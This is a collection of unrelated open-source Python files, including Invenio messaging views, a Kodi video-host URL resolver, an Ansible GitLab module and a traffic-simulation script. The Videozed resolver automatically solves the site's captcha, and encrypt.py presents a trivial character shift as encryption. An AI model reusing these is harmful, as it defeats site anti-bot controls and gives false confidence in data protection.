except db.sqlalchemy.orm.exc.NoResultFound:
# The message exists in table user_msgMESSAGE
# but not in table msgMESSAGE => table inconsistency
flash(_('This message does not exist.'), "error")
except:
flash(_('Problem with loading message.'), "error")
return redirect(url_for('.index'))
form = AddMsgMESSAGEForm(request.values)
if form.validate_on_submit():
m = MsgMESSAGE()
form.populate_obj(m)
m.id_user_from = uid
m.sent_date = datetime.now()
quotas = dblayer.check_quota(cfg['CFG_WEBMESSAGE_MAX_NB_OF_MESSAGES'] - 1)
users = filter(lambda x: x.id in quotas, m.recipients)
#m.recipients = m.recipients.difference(users))
for u in users:
m.recipients.remove(u)
if len(users) > 0:
flash(_('Following users reached their quota %(quota)d messages: %(users)s',
quota=cfg['CFG_WEBMESSAGE_MAX_NB_OF_MESSAGES'],
users=', '.join([u.nickname for u in users])), "error")
flash(_('Message has %(recipients)d valid recipients.',
recipients=len(m.recipients)), "info")
if len(m.recipients) == 0:
flash(_('Message was not sent'), "info")
else:
if m.received_date is not None and m.received_date > datetime.now():
for um in m.sent_to_users:
um.status = cfg['CFG_WEBMESSAGE_STATUS_CODE']['REMINDER']
else:
m.received_date = datetime.now()
try:
db.session.add(m)
db.session.commit()
flash(_('Message was sent'), "info")
return redirect(url_for('.index'))
except:
db.session.rollback()
return render_template('messages/add.html', form=form)
@blueprint.route("/view")
@blueprint.route("/display_msg")
@register_breadcrumb(blueprint, '.view', _('View a message'))
@login_required
@permission_required('usemessages')
@wash_arguments({'msgid': (int, 0)})
@templated('messages/view.html')
def view(msgid):
uid = current_user.get_id()
if (dbquery.check_user_owns_message(uid, msgid) == 0):
flash(_('Sorry, this message (#%(x_msg)d) is not in your mailbox.',
x_msg=msgid), "error")
else:
try:
m = dbquery.get_message(uid, msgid)
m.status = cfg['CFG_WEBMESSAGE_STATUS_CODE']['READ']
            ## It's not necessary since "m" is an SQLAlchemy object bound to the same
            ## session.
##db.session.add(m)
## I wonder if the autocommit works ...
# Commit changes before rendering for correct menu update.
db.session.commit()
return dict(m=m)
except db.sqlalchemy.orm.exc.NoResultFound:
flash(_('This message does not exist.'), "error")
except:
flash(_('Problem with loading message.'), "error")
return redirect(url_for('.index'))
@blueprint.route("/delete", methods=['GET', 'POST'])
@login_required
@permission_required('usemessages')
def delete():
"""
    Delete the messages specified by 'msgid' that belong to the logged-in user.
"""
uid = current_user.get_id()
msgids = request.values.getlist('msgid', type=int)
if len(msgids) <= 0:
flash(_('Sorry, no valid message specified.'), "error")
elif dbquery.check_user_owns_message(uid, msgids) < len(msgids):
flash(_('Sorry, this message (#%(x_msg)s) is not in your mailbox.', x_msg=(str(msgids), )), "error")
else:
if dbquery.delete_message_from_user_inbox(uid, msgids) == 0:
flash(_("The message could not be deleted."), "error")
else:
flash(_("The message was successfully deleted."), "info")
return redirect(url_for('.index'))
@blueprint.route("/delete_all", methods=['GET', 'POST'])
@register_breadcrumb(blueprint, '.delete', _('Delete all messages'))
@login_required
@permission_required('usemessages')
@wash_arguments({'confirmed': (int, 0)})
def delete_all(confirmed=0):
"""
    Delete every message belonging to the logged-in user.
@param confirmed: 0 will produce a confirmation message.
"""
uid = current_user.get_id()
if confirmed != 1:
return render_template('messages/confirm_delete.html')
if dbquery.delete_all_messages(uid):
flash(_("Your mailbox has been emptied."), "info")
else:
flash(_("Could not empty your mailbox."), "warning")
return redirect(url_for('.index'))
# Registration of email_alert invoked from blueprint
# in order to use before_app_first_request.
# Reading config CFG_WEBMESSAGE_EMAIL_ALERT
# requires an app context.
@blueprint.before_app_first_request
def invoke_email_alert_register():
email_alert_register()
|
egabancho/invenio
|
invenio/modules/messages/views.py
|
Python
|
gpl-2.0
| 10,605
|
'''
Videozed urlresolver plugin
Copyright (C) 2013 Vinnydude
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
from t0mm0.common.net import Net
from urlresolver.plugnplay.interfaces import UrlResolver
from urlresolver.plugnplay.interfaces import PluginSettings
from urlresolver.plugnplay import Plugin
import re, xbmcgui
from urlresolver import common
from lib import jsunpack
net = Net()
class VideozedResolver(Plugin, UrlResolver, PluginSettings):
implements = [UrlResolver, PluginSettings]
name = "videozed"
def __init__(self):
p = self.get_setting('priority') or 100
self.priority = int(p)
self.net = Net()
def get_media_url(self, host, media_id):
try:
url = self.get_url(host, media_id)
html = self.net.http_GET(url).content
dialog = xbmcgui.DialogProgress()
dialog.create('Resolving', 'Resolving Videozed Link...')
dialog.update(0)
data = {}
r = re.findall(r'type="(?:hidden|submit)?" name="(.+?)"\s* value="?(.+?)">', html)
for name, value in r:
data[name] = value
html = net.http_POST(url, data).content
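            # The captcha digits are rendered as HTML numeric entities (&#NN;) positioned
            # with a "left: Npx" style; sorting by the left offset restores reading order,
            # and subtracting 48 (the code for '0') from each entity number gives the digit.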
captcha = re.compile("left:(\d+)px;padding-top:\d+px;'>&#(.+?);<").findall(html)
result = sorted(captcha, key=lambda ltr: int(ltr[0]))
solution = ''.join(str(int(num[1])-48) for num in result)
r = re.findall(r'type="hidden" name="(.+?)" value="(.+?)">', html)
for name, value in r:
data[name] = value
data.update({'code':solution})
html = net.http_POST(url, data).content
sPattern = '<script type=(?:"|\')text/javascript(?:"|\')>(eval\('
sPattern += 'function\(p,a,c,k,e,d\)(?!.+player_ads.+).+np_vid.+?)'
sPattern += '\s+?</script>'
r = re.search(sPattern, html, re.DOTALL + re.IGNORECASE)
if r:
sJavascript = r.group(1)
sUnpacked = jsunpack.unpack(sJavascript)
sPattern = '<embed id="np_vid"type="video/divx"src="(.+?)'
sPattern += '"custommode='
r = re.search(sPattern, sUnpacked)
if r:
dialog.update(100)
dialog.close()
return r.group(1)
else:
num = re.compile('videozed\|(.+?)\|http').findall(html)
pre = 'http://'+num[0]+'.videozed.com:182/d/'
preb = re.compile('image\|(.+?)\|video\|(.+?)\|').findall(html)
for ext, link in preb:
r = pre+link+'/video.'+ext
dialog.update(100)
dialog.close()
return r
except Exception, e:
common.addon.log('**** Videozed Error occured: %s' % e)
common.addon.show_small_popup('Error', str(e), 5000, '')
return self.unresolvable(code=0, msg=e)
def get_url(self, host, media_id):
return 'http://www.videozed.net/%s' % media_id
def get_host_and_id(self, url):
r = re.search('//(.+?)/([0-9a-zA-Z]+)',url)
if r:
return r.groups()
else:
return False
return('host', 'media_id')
def valid_url(self, url, host):
if self.get_setting('enabled') == 'false': return False
return (re.match('http://(www.)?videozed.net/' +
'[0-9A-Za-z]+', url) or
'videozed' in host)
|
SMALLplayer/smallplayer-image-creator
|
storage/.xbmc/addons/script.module.urlresolver/lib/urlresolver/plugins/videozed.py
|
Python
|
gpl-2.0
| 4,224
|
# -*- coding: utf-8 -*-
__author__, __date__ = 'mehdy', '5/4/15'
|
TelePy/TelePy
|
telepy/models/__init__.py
|
Python
|
gpl-2.0
| 66
|
import discord
from sigma.core.utilities.data_processing import user_avatar
from .move_log_embed import make_move_log_embed
async def leave_move_log(ev, guild):
if ev.bot.cfg.pref.movelog_channel:
mlc_id = ev.bot.cfg.pref.movelog_channel
mlc = discord.utils.find(lambda x: x.id == mlc_id, ev.bot.get_all_channels())
if mlc:
if guild.icon_url:
icon = guild.icon_url
else:
icon = user_avatar(guild.owner)
log_embed = discord.Embed(color=0xBE1931)
log_embed.set_author(name='Left A Guild', icon_url=icon, url=icon)
make_move_log_embed(log_embed, guild)
await mlc.send(embed=log_embed)
|
AXAz0r/apex-sigma-core
|
sigma/modules/core_functions/system/leave_move_log.py
|
Python
|
gpl-3.0
| 717
|
#
# Copyright 2007-2012 Free Software Foundation, Inc.
# Copyright (C) by Josh Blum. See LICENSE.txt for licensing information.
#
# This file is part of GREX
#
# GREX is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GREX is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GREX; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
import unittest
import gras
from gras import TestUtils
import numpy
class test_noise_source(unittest.TestCase):
def setUp(self):
self.tb = gras.TopBlock()
def tearDown(self):
self.tb = None
def test_float32(self):
op = gras.make('/grex/noise_source_f32', 0)
op.set_waveform("GAUSSIAN")
op.set_amplitude(10)
head = TestUtils.Head(numpy.float32, 12)
dst = TestUtils.VectorSink(numpy.float32)
self.tb.connect(op, head, dst)
self.tb.run()
# expected results for Gaussian with seed 0, ampl 10
expected_result =(-6.8885869979858398, 26.149959564208984,
20.575775146484375, -7.9340143203735352,
5.3359274864196777, -12.552099227905273,
6.333674430847168, -23.830753326416016,
-16.603046417236328, 2.9676761627197266,
1.2176077365875244, 15.100193977355957)
dst_data = dst.data()
self.assertEqual(len(expected_result), len(dst_data))
for i in range(len(dst_data)):
self.assertAlmostEqual(expected_result[i], dst_data[i], places=3)
if __name__ == '__main__':
unittest.main()
|
manojgudi/sandhi
|
modules/grex/sources/noise_source_test.py
|
Python
|
gpl-3.0
| 2,098
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2019, Markus Bergholz (markuman@gmail.com)
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
module: gitlab_project_variable
short_description: Creates/updates/deletes GitLab Projects Variables
description:
- When a project variable does not exist, it will be created.
- When a project variable does exist, its value will be updated when the values are different.
- Variables which are not mentioned in the playbook but exist in the GitLab project
  either stay untouched (I(purge) is C(false)) or will be deleted (I(purge) is C(true)).
version_added: "2.9"
author:
- "Markus Bergholz (@markuman)"
requirements:
- python >= 2.7
- python-gitlab python module
extends_documentation_fragment:
- auth_basic
options:
state:
description:
- Create or delete project variable.
- Possible values are present and absent.
default: present
type: str
choices: ["present", "absent"]
api_token:
description:
- GitLab access token with API permissions.
required: true
type: str
project:
description:
- The path and name of the project.
required: true
type: str
purge:
description:
- When set to true, all variables which are not mentioned in the task will be deleted.
default: false
type: bool
vars:
description:
- A list of key value pairs.
default: {}
type: dict
'''
EXAMPLES = '''
- name: Set or update some CI/CD variables
gitlab_project_variable:
api_url: https://gitlab.com
api_token: secret_access_token
project: markuman/dotfiles
purge: false
vars:
ACCESS_KEY_ID: abc123
SECRET_ACCESS_KEY: 321cba
- name: Delete one variable
gitlab_project_variable:
api_url: https://gitlab.com
api_token: secret_access_token
project: markuman/dotfiles
state: absent
vars:
ACCESS_KEY_ID: abc123
'''
RETURN = '''
project_variable:
description: Four lists of the variable names which were added, updated, removed or left untouched.
returned: always
type: dict
contains:
added:
description: A list of variables which were created.
returned: always
type: list
sample: "['ACCESS_KEY_ID', 'SECRET_ACCESS_KEY']"
untouched:
description: A list of variables which exist.
returned: always
type: list
sample: "['ACCESS_KEY_ID', 'SECRET_ACCESS_KEY']"
removed:
description: A list of variables which were deleted.
returned: always
type: list
sample: "['ACCESS_KEY_ID', 'SECRET_ACCESS_KEY']"
updated:
description: A list of variables whose values were changed.
returned: always
type: list
sample: "['ACCESS_KEY_ID', 'SECRET_ACCESS_KEY']"
'''
import traceback
from ansible.module_utils.basic import AnsibleModule, missing_required_lib
from ansible.module_utils._text import to_native
from ansible.module_utils.api import basic_auth_argument_spec
GITLAB_IMP_ERR = None
try:
import gitlab
HAS_GITLAB_PACKAGE = True
except Exception:
GITLAB_IMP_ERR = traceback.format_exc()
HAS_GITLAB_PACKAGE = False
class GitlabProjectVariables(object):
def __init__(self, module, gitlab_instance):
self.repo = gitlab_instance
self.project = self.get_project(module.params['project'])
self._module = module
def get_project(self, project_name):
return self.repo.projects.get(project_name)
def list_all_project_variables(self):
return self.project.variables.list()
def create_variable(self, key, value):
if self._module.check_mode:
return
return self.project.variables.create({"key": key, "value": value})
def update_variable(self, var, value):
if var.value == value:
return False
if self._module.check_mode:
return True
var.value = value
var.save()
return True
def delete_variable(self, key):
if self._module.check_mode:
return
return self.project.variables.delete(key)
def native_python_main(this_gitlab, purge, var_list, state):
change = False
return_value = dict(added=list(), updated=list(), removed=list(), untouched=list())
gitlab_keys = this_gitlab.list_all_project_variables()
existing_variables = [x.get_id() for x in gitlab_keys]
for key in var_list:
if key in existing_variables:
index = existing_variables.index(key)
existing_variables[index] = None
if state == 'present':
single_change = this_gitlab.update_variable(
gitlab_keys[index], var_list[key])
change = single_change or change
if single_change:
return_value['updated'].append(key)
else:
return_value['untouched'].append(key)
elif state == 'absent':
this_gitlab.delete_variable(key)
change = True
return_value['removed'].append(key)
elif key not in existing_variables and state == 'present':
this_gitlab.create_variable(key, var_list[key])
change = True
return_value['added'].append(key)
existing_variables = list(filter(None, existing_variables))
if purge:
for item in existing_variables:
this_gitlab.delete_variable(item)
change = True
return_value['removed'].append(item)
else:
return_value['untouched'].extend(existing_variables)
return change, return_value
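# Illustrative sketch (not part of the module): for a project that already holds the
# variables FOO and BAR, a call such as
#
#     native_python_main(this_gitlab, purge=True,
#                        var_list={'FOO': 'new', 'BAZ': 'x'}, state='present')
#
# updates FOO (assuming its value changed), creates BAZ and, because purge is true,
# deletes BAR, returning roughly
# (True, {'added': ['BAZ'], 'updated': ['FOO'], 'removed': ['BAR'], 'untouched': []}).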
def main():
argument_spec = basic_auth_argument_spec()
argument_spec.update(
api_token=dict(type='str', required=True, no_log=True),
project=dict(type='str', required=True),
purge=dict(type='bool', required=False, default=False),
vars=dict(type='dict', required=False, default=dict()),
state=dict(type='str', default="present", choices=["absent", "present"])
)
module = AnsibleModule(
argument_spec=argument_spec,
mutually_exclusive=[
['api_username', 'api_token'],
['api_password', 'api_token'],
],
required_together=[
['api_username', 'api_password'],
],
required_one_of=[
['api_username', 'api_token']
],
supports_check_mode=True
)
api_url = module.params['api_url']
gitlab_token = module.params['api_token']
purge = module.params['purge']
var_list = module.params['vars']
state = module.params['state']
if not HAS_GITLAB_PACKAGE:
module.fail_json(msg=missing_required_lib("python-gitlab"), exception=GITLAB_IMP_ERR)
try:
gitlab_instance = gitlab.Gitlab(url=api_url, private_token=gitlab_token)
gitlab_instance.auth()
except (gitlab.exceptions.GitlabAuthenticationError, gitlab.exceptions.GitlabGetError) as e:
module.fail_json(msg="Failed to connect to GitLab server: %s" % to_native(e))
except (gitlab.exceptions.GitlabHttpError) as e:
module.fail_json(msg="Failed to connect to Gitlab server: %s. \
Gitlab remove Session API now that private tokens are removed from user API endpoints since version 10.2" % to_native(e))
this_gitlab = GitlabProjectVariables(module=module, gitlab_instance=gitlab_instance)
change, return_value = native_python_main(this_gitlab, purge, var_list, state)
module.exit_json(changed=change, project_variable=return_value)
if __name__ == '__main__':
main()
|
aperigault/ansible
|
lib/ansible/modules/source_control/gitlab_project_variable.py
|
Python
|
gpl-3.0
| 7,894
|
f1=open("file_before_enc.txt","r")
s=f1.read()
f1.close()
s=list(s)
s.reverse()
for i in range(len(s)):
s[i]=chr(ord(s[i])+len(s)-i)
s="".join(s)
f2=open("encrypted_file.txt","w+")
f2.write(s)
f2.close()
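# Hedged companion sketch (not in the original repo): undoes the transform above by
# subtracting the same per-position offset and reversing the characters back.
f3=open("encrypted_file.txt","r")
d=f3.read()
f3.close()
d=list(d)
for i in range(len(d)):
    d[i]=chr(ord(d[i])-(len(d)-i))
d.reverse()
f4=open("decrypted_file.txt","w+")
f4.write("".join(d))
f4.close()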
|
hacktoberfest17/programming
|
encryption_algorithms/simple_encryption_algo_python3/encrypt.py
|
Python
|
gpl-3.0
| 205
|
# Copyright 2012-2013, University of Amsterdam. This program is free software:
# you can redistribute it and/or modify it under the terms of the GNU Lesser
# General Public License as published by the Free Software Foundation, either
# version 3 of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License
# for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import re
# This replaces MediaWiki syntax for '''bold''' and ''italic'' text with the equivalent HTML markup.
class EmphasisResolver:
def resolve_emphasis(self, text):
sb = []
for line in text.split("\n"):
sb.append(self.resolve_line(line))
sb.append("\n")
result = "".join(sb)
result = result[:-1]
return result
# This is a direct translation of the php function doAllQuotes used by the original MediaWiki software.
#
# @param line the line to resolve emphasis within
# @return the line, with all emphasis markup resolved to html tags
#
def resolve_line(self, line):
#print "Resolving line '" + line + "'"
arr = self.get_splits("$"+line)
if len(arr) <= 1:
return line
# First, do some preliminary work. This may shift some apostrophes from
# being mark-up to being text. It also counts the number of occurrences
# of bold and italics mark-ups.
numBold = 0
numItalics = 0
for i, value in enumerate(arr):
if (i % 2 == 1):
# If there are ever four apostrophes, assume the first is supposed to
# be text, and the remaining three constitute mark-up for bold text.
if (len(arr[i]) == 4):
arr[i-1] = arr[i-1] + "'" ;
arr[i] = self.get_filled_string(3) ;
elif len(arr[i]) > 5:
# If there are more than 5 apostrophes in a row, assume they're all
# text except for the last 5.
arr[i-1] = arr[i-1] + self.get_filled_string(len(arr[i])-5)
arr[i] = self.get_filled_string(5)
size = len(arr[i])
if size == 2:
numItalics +=1
elif size == 3:
numBold+=1
elif size == 5:
numItalics +=1
numBold +=1
# If there is an odd number of both bold and italics, it is likely
# that one of the bold ones was meant to be an apostrophe followed
# by italics. Which one we cannot know for certain, but it is more
# likely to be one that has a single-letter word before it.
if (numBold%2==1) and (numItalics%2==1):
i= 0
firstSingleLetterWord = -1
firstMultiLetterWord = -1
firstSpace = -1
for r in arr:
if i%2==1 and len(r)==3:
x1 = arr[i-1][len(arr[i-1])-1]
x2 = arr[i-1][len(arr[i-1])-2]
if x1==' ':
if firstSpace == -1:
firstSpace = i ;
elif x2==' ':
if firstSingleLetterWord == -1:
firstSingleLetterWord = i
else:
if firstMultiLetterWord == -1:
firstMultiLetterWord = i
i += 1
# If there is a single-letter word, use it!
if firstSingleLetterWord > -1:
arr[firstSingleLetterWord] = "''"
arr[firstSingleLetterWord-1] = arr[firstSingleLetterWord] + "'"
elif firstMultiLetterWord > -1:
# If not, but there's a multi-letter word, use that one.
arr[firstMultiLetterWord] = "''"
arr[firstMultiLetterWord-1] = arr[firstMultiLetterWord] + "'"
elif firstSpace > -1:
# ... otherwise use the first one that has neither.
# (notice that it is possible for all three to be -1 if, for example,
# there is only one pentuple-apostrophe in the line)
arr[firstSpace] = "''"
arr[firstSpace-1] = arr[firstSpace] + "'"
# Now let's actually convert our apostrophic mush to HTML!
output = []
buffer = []
state = "" ;
i = 0
for r in arr:
if i%2==0:
if state == "both":
buffer.append(r)
else:
output.append(r)
else:
if len(r) == 2:
if state == "i":
output.append("</i>")
state = ""
elif state == "bi":
output.append("</i>")
state = "b"
elif state =="ib":
output.append("</b></i><b>");
state = "b";
elif state =="both":
output.append("<b><i>") ;
output.append("".join(buffer))
output.append("</i>") ;
state = "b";
else:
# $state can be "b" or ""
output.append("<i>")
state = state + "i"
elif len(r) == 3:
if state == "b":
output.append("</b>")
state = ""
elif state == "bi":
output.append("</i></b><i>")
state = "i"
elif state =="ib":
output.append("</b>");
state = "i";
elif state =="both":
output.append("<i><b>") ;
output.append("".join(buffer))
output.append("</b>") ;
state = "i";
else:
# $state can be "b" or ""
output.append("<b>")
state = state + "b"
elif len(r) == 5:
if state == "b":
output.append("</b><i>")
state = "i"
elif state == "i":
output.append("</i><b>")
state = "b"
elif state =="bi":
output.append("</i></b>");
state = "";
elif state =="ib":
output.append("</b></i>") ;
state = "";
elif state =="both":
output.append("<i><b>") ;
output.append("".join(buffer))
output.append("</b></i>") ;
state = "i";
else:
# ($state == "")
buffer = []
state = "both"
i += 1
# Now close all remaining tags. Notice that the order is important.
if state == "b" or state == "ib":
output.append("</b>")
if state == "i" or state == "bi" or state == "ib":
output.append("</i>")
if state == "bi":
output.append("</b>")
# There might be lonely ''''', so make sure we have a buffer
if state == "both" and len(buffer) > 0:
output.append("<b><i>")
output.append("".join(buffer))
output.append("</i></b>")
#remove leading $
output = output[1:]
return "".join(output)
# Does the same job as php function preg_split
def get_splits(self, text):
#return re.split("\\'{2,}", text)
splits = []
lastCopyIndex = 0
p = re.compile("\\'{2,}")
for m in p.finditer(text):
if m.start() > lastCopyIndex:
splits.append( text[lastCopyIndex: m.start()] )
splits.append( m.group() )
lastCopyIndex = m.end()
if lastCopyIndex < len(text)-1:
            splits.append(text[lastCopyIndex:])  # keep all remaining trailing text
return splits
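    # Illustrative example (not from the source): the apostrophe runs become their own
    # elements, so resolve_line sees alternating text/markup tokens, e.g.
    #   get_splits("$It ''is'' '''bold'''")
    #   -> ["$It ", "''", "is", "''", " ", "'''", "bold", "'''"]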
def get_filled_string(self, length):
sb = []
for i in xrange(0,length):
sb.append("'")
return "".join(sb)
## EmphasisResolver testing using
## python -m semanticizer.wpm.utils.emphasis_resolver
if __name__ == '__main__':
er = EmphasisResolver()
markup = "'''War''' is an openly declared state of organized [[violent]] [[Group conflict|conflict]], typified by extreme [[aggression]], [[societal]] disruption, and high [[Mortality rate|mortality]]. As a behavior pattern, warlike tendencies are found in many [[primate]] species, including [[humans]], and also found in many [[ant]] species. The set of techniques used by a group to carry out war is known as '''warfare'''."
#markup = "Parsing '''MediaWiki''''s syntax for '''bold''' and ''italic'' markup is a '''''deceptively''' difficult'' task. Whoever came up with the markup scheme should be '''shot'''." ;
print er.resolve_emphasis(markup)
|
redreamality/semanticizer
|
semanticizer/wpm/utils/emphasis_resolver.py
|
Python
|
gpl-3.0
| 9,642
|
# -*- coding: Latin-1 -*-
"""
@file GenerateRawFCD.py
@author Sascha Krieg
@author Daniel Krajzewicz
@author Michael Behrisch
@date 2008-07-26
Creates files comparing, for each edge, the speed measured by the taxis with the average speed on that edge.
The results depend on the sampling frequency (period) and the taxi quota.
SUMO, Simulation of Urban MObility; see http://sumo.sourceforge.net/
Copyright (C) 2008-2012 DLR (http://www.dlr.de/) and contributors
All rights reserved
"""
import random
import os.path
import profile
from cPickle import dump
from cPickle import load
#global vars
mainPath="D:/Krieg/Projekte/Diplom/Daten/fcdQualitaet/"
#mainPath="F:/DLR/Projekte/Diplom/Daten/fcdQualitaet/"
edgeDumpPath=mainPath+"edgedumpFcdQuality_900_6Uhr.xml"
edgeDumpPicklePath=mainPath+"edgedumpFcdPickleDict.pickle"
vtypePath=mainPath+"vtypeprobeFcdQuality_1s_6Uhr.out.xml"
vtypePicklePath=mainPath+"vtypeprobePickleDict.pickle"
vehPicklePath=mainPath+"vehiclePickleList.pickle"
outputPath=mainPath+"output/simResult_"
simStartTime=21600 # =6 o'clock ->begin in edgeDump
period=[5,10,20,30,40,50,60,90,120] #period in seconds | single element or a whole list
quota=[0.25, 0.5, 0.75, 1.0, 1.5, 2.0, 3.0, 5.0, 10.0] #how many taxis in percent of the total vehicles | single element or a whole list
def main():
global period, quota
print "start program"
edgeDumpDict=make(edgeDumpPicklePath,edgeDumpPath,readEdgeDump)
vtypeDict=make(vtypePicklePath,vtypePath,readVtype)
vehList=make(vehPicklePath,vtypePicklePath,getVehicleList,False,vtypeDict)
vehSum=len(vehList)
if type(period)!=list: period=[period]
if type(quota)!=list: quota=[quota]
pList=period
qList=quota
for period in pList:
for quota in qList:
print "create output for: period ",period," quota ",quota
taxis=chooseTaxis(vehList)
taxiSum=len(taxis)
vtypeDictR=reduceVtype(vtypeDict,taxis); del taxis
createOutput(edgeDumpDict, vtypeDictR,vehSum, taxiSum)
print "end"
def readEdgeDump():
"""Get for each interval all edges with corresponding speed."""
edgeDumpDict={}
begin=False
interval=0
inputFile=open(edgeDumpPath,'r')
for line in inputFile:
words=line.split('"')
if not begin and words[0].find("<end>")!=-1:
words=words[0].split(">")
interval=int(words[1][:-5])
edgeDumpDict.setdefault(interval,[])
elif words[0].find("<interval")!=-1 and int(words[1])>=simStartTime:
interval=int(words[1])
begin=True
if begin and words[0].find("<edge id")!=-1:
edge=words[1]
speed=float(words[13])
edgeDumpDict.setdefault(interval,[]).append((edge,speed))
inputFile.close()
return edgeDumpDict
def readVtype():
"""Gets all necessary information of all vehicles."""
vtypeDict={}
timestep=0
begin=False
inputFile=open(vtypePath,'r')
for line in inputFile:
words=line.split('"')
if words[0].find("<timestep ")!=-1 and int(words[1])>=simStartTime:
timestep=int(words[1])
begin=True
if begin and words[0].find("<vehicle id=")!=-1:
# time id edge speed
vtypeDict.setdefault(timestep,[]).append((words[1],words[3][:-2],words[15]))
#break
inputFile.close()
return vtypeDict
def getVehicleList(vtypeDict):
"""Collects all vehicles used in the simulation."""
vehSet=set()
for timestepList in vtypeDict.values():
for elm in timestepList:
vehSet.add(elm[0])
return list(vehSet)
def make(source, dependentOn, builder, buildNew=False,*builderParams):
"""Fills the target (a variable) with Information of source (pickelt var).
It Checks if the pickle file is up to date in comparison to the dependentOn file.
If not the builder function is called.
If buildNew is True the builder function is called anyway.
"""
#check if pickle file exists
if not os.path.exists(source):
buildNew=True
#check date
if not buildNew and os.path.getmtime(source)>os.path.getmtime(dependentOn): #if source is newer
print "load source: ",os.path.basename(source),"..."
target=load(open(source,'rb'))
else:
print "build source: ",os.path.basename(source),"..."
target=builder(*builderParams)
#pickle the target
dump(target, open(source,'wb'),1)
print "Done!"
return target
def chooseTaxis(vehList):
""" Chooses from the vehicle list random vehicles with should act as taxis."""
#calc absolute amount of taxis
taxiNo=int(round(quota*len(vehList)/100))
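    # e.g. quota=0.25 (percent) with 10,000 vehicles -> int(round(0.25 * 10000 / 100)) = 25 taxis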
random.shuffle(vehList)
return vehList[:taxiNo]
def reduceVtype(vtypeDict,taxis):
"""Reduces the vtypeDict to the relevant information."""
newVtypeDict={}
for timestep in vtypeDict:
if timestep%period==0: #timesteps which are a multiple of the period
newVtypeDict[timestep]=([tup for tup in vtypeDict[timestep] if tup[0] in taxis])
return newVtypeDict
def createOutput(edgeDumpDict, vtypeDict,vehSum, taxiSum):
"""Creates a file with a comparison of speeds for each edge
between the taxis and the average speed from the current edge."""
intervalList=edgeDumpDict.keys()
intervalList.sort()
interval=intervalList[1]-intervalList[0]
outputFile=open(outputPath+str(period)+"s_"+str(quota)+"%.out.xml",'w')
outputFile.write('<?xml version="1.0"?>\n')
outputFile.write('<results simStart="%d" interval="%d" taxiQuota="%.3f" period="%d" vehicles="%d" taxis="%d">\n' %(simStartTime, interval, quota, period, vehSum, taxiSum))
for i in intervalList[:-1]: #each interval
outputFile.write('\t<interval begin="%d" end="%d">\n' %(i,i+interval-1))
intEdges={}
for timestep,taxiList in vtypeDict.iteritems():
if i<timestep<intervalList[intervalList.index(i)+1]: #for each timestep in the interval
for tup in taxiList: #all elements in this timestep
intEdges.setdefault(tup[1],[]).append(float(tup[2])) #add speed entry to the relevant edge
        # write results for every edge found
for edge,v in edgeDumpDict[i]:
if edge in intEdges:
vList=intEdges[edge]
meanV=sum(vList)/len(vList)
abs=meanV-v
rel=abs/v*100
outputFile.write('\t\t<edge id="%s" simSpeed="%.2f" fcdSpeed="%.2f" absDeviation="%.2f" relDeviation="%.2f"/>\n' %(edge, v, meanV, abs,rel))
outputFile.write('\t</interval>\n')
outputFile.write('</results>')
outputFile.close()
#start the program
#profile.run('main()')
main()
|
rudhir-upretee/Sumo_With_Netsim
|
tools/projects/TaxiFCD_Krieg/src/fcdQuality/ParamEffectsOLD.py
|
Python
|
gpl-3.0
| 7,055
|
"""Deprecated import support. Auto-generated by import_shims/generate_shims.sh."""
# pylint: disable=redefined-builtin,wrong-import-position,wildcard-import,useless-suppression,line-too-long
from import_shims.warn import warn_deprecated_import
warn_deprecated_import('contentstore.api.tests', 'cms.djangoapps.contentstore.api.tests')
from cms.djangoapps.contentstore.api.tests import *
|
eduNEXT/edunext-platform
|
import_shims/studio/contentstore/api/tests/__init__.py
|
Python
|
agpl-3.0
| 389
|
#-*- coding:utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>). All Rights Reserved
# d$
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'account_invoice_journal_defaults',
'version': '1.0',
'category': 'Accounting & Finance',
"sequence": 4,
'complexity': "normal",
'description': '''
* account_id and journal_id added to onchange_partner
* account_id added in onchange_journal
* account_id associated with the journal or with the account in the partner
* account_id changed to read-only
''',
"author" : 'ClearCorp',
'website':'http://www.clearcorp.co.cr',
"depends" : ['account'],
'update_xml': [
'account_invoice_journal_defaults_view.xml',
],
"auto_install": False,
"application": False,
"installable": True,
'license': 'AGPL-3',
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
sysadminmatmoz/odoo-clearcorp
|
account_invoice_journal_defaults/__openerp__.py
|
Python
|
agpl-3.0
| 1,847
|
"""Processing of implementation manifests.
A manifest is a string representing a directory tree, with the property
